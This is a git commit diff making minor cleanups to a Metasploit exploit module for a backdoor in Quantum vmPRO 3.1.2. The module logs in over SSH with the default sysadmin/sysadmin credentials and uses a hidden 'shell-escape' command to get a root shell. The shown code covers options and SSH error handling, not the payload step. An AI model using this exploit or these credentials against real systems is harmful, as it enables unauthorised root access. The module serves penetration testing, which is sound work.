Do minor clean up
parent
c116697c70
commit
f656e5fedb
|
@ -15,18 +15,18 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
super(update_info(info,
|
||||
'Name' => "Quantum vmPRO Backdoor Command",
|
||||
'Description' => %q{
|
||||
This module exploits a backdoor command flaw in vmPRO 3.1.2.
|
||||
Any user without admin privileges can get access to the restricted SSH shell.
|
||||
By using the hidden backdoor "shell-escape" command it's possible to drop to
|
||||
a real root bash shell.
|
||||
This module abuses a backdoor command in vmPRO 3.1.2. Any user, even without admin
|
||||
privileges, can get access to the restricted SSH shell. By using the hidden backdoor
|
||||
"shell-escape" command it's possible to drop to a real root bash shell.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'xistence <xistence[at]0x90.nl>', # Original discovery and Metasploit module
|
||||
'xistence <xistence[at]0x90.nl>' # Original discovery and Metasploit module
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
['URL', 'http://packetstormsecurity.com/files/125760/quantumvmpro-backdoor.txt']
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
|
@ -51,7 +51,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
register_options(
|
||||
[
|
||||
Opt::RHOST(),
|
||||
Opt::RPORT(22),
|
||||
OptString.new('USER', [ true, 'vmPRO SSH user', 'sysadmin']),
|
||||
OptString.new('PASS', [ true, 'vmPRO SSH password', 'sysadmin'])
|
||||
|
@ -98,18 +97,19 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
ssh = Net::SSH.start(rhost, user, opts)
|
||||
end
|
||||
rescue Rex::ConnectionError, Rex::AddressInUse
|
||||
return
|
||||
return nil
|
||||
rescue Net::SSH::Disconnect, ::EOFError
|
||||
print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation"
|
||||
return
|
||||
return nil
|
||||
rescue ::Timeout::Error
|
||||
print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"
|
||||
return
|
||||
return nil
|
||||
rescue Net::SSH::AuthenticationFailed
|
||||
print_error "#{rhost}:#{rport} SSH - Failed authentication"
|
||||
return nil
|
||||
rescue Net::SSH::Exception => e
|
||||
print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}"
|
||||
return
|
||||
return nil
|
||||
end
|
||||
|
||||
if ssh
|
||||
|
|
Loading…
Reference in New Issue